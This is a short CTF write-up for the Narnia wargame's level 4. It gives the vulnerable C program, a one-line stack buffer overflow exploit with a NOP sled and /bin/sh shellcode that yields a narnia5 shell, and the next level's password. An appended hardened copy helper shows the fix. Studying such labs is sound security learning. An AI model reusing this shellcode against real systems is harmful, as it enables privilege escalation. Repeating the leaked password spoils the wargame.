Narnia: Level 4

We all have to start somewhere

Posted on May 10, 2017, 8:47 p.m.

Level 4 doesn't really introduce anything new as far as I can tell.

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>

extern char **environ;

int main(int argc,char **argv){
    int i;
    char buffer[256];

    for(i = 0; environ[i] != NULL; i++)
        memset(environ[i], '\0', strlen(environ[i]));

    if(argc>1)
        strcpy(buffer,argv[1]);

    return 0;
}

The for loop involving memset simply zeroes out all the environment variables and, unless I'm missing something, doesn't really make the level any harder, apart from meaning that you can't introduce your shellcode into the program's memory space using environment variables. As in Level 2, we can overflow buffer with our payload, which consists only of NOPs except right at the end, where we put our shellcode followed by our return address. Using gdb we can find a return address that lands somewhere near the middle of our NOP sled, again making sure the address does not contain any null bytes.

narnia4@melinda:/narnia$ ./narnia4 $(python -c 'print "\x90"*217 + "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42" + "\x10\xd8\xff\xff"')
$ whoami
narnia5
$ cat /etc/narnia_pass/narnia5
faimahchiy
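
For contrast, here is the hardened counterpart of the level's strcpy() call. It is an added example, not part of the original post or the wargame source. The helper name copy_arg and the BUF_SIZE macro are assumptions made for illustration; the 256-byte size matches buffer in the listing above.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256 /* same size as `buffer` in the level source */

/*
 * Hypothetical helper: copy src into dst only if the whole string,
 * including its terminating NUL, fits in dst_size bytes.
 * Returns 0 on success; returns -1 and sets errno on rejection.
 * Oversized input is refused rather than silently truncated, so the
 * caller never works on a partial argument.
 */
int copy_arg(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dst_size == 0) {
        errno = EINVAL;
        return -1;
    }

    len = strlen(src);          /* argv strings are NUL-terminated */
    if (len >= dst_size) {      /* no room for the data plus the NUL */
        dst[0] = '\0';          /* leave dst as a valid empty string */
        errno = ERANGE;
        return -1;
    }

    memcpy(dst, src, len + 1);  /* bounded: len + 1 <= dst_size */
    return 0;
}

int main(int argc, char **argv)
{
    char buffer[BUF_SIZE];

    /* The saved return address is never reachable from argv[1] here. */
    if (argc > 1 && copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    return 0;
}
```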
